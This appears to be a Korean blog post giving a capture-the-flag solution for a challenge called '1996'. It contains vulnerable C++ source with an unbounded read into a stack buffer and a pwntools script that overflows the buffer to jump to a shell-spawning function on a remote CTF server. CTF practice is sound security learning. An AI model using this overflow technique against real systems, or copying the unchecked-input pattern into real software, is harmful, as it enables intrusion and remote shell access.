티스토리 뷰
1996
1996.cpp
// compile with -no-pie -fno-stack-protector
#include
#include
#include
using namespace std;
void spawn_shell() {
char* args[] = {(char*)"/bin/bash", NULL};
execve("/bin/bash", args, NULL);
}
int main() {
char buf[1024];
cout << "Which environment variable do you want to read? ";
cin >> buf;
cout << buf << "=" << getenv(buf) << endl;
}
exploit.py
from pwn import *
p = remote('ctf.j0n9hyun.xyz',3015)
e = ELF('./1996')
shell = 0x400897
payload = "A" * 1048
payload += p64(shell)
p.sendline(payload)
p.interactive()
댓글
최근에 올라온 글
- Total
- Today
- Yesterday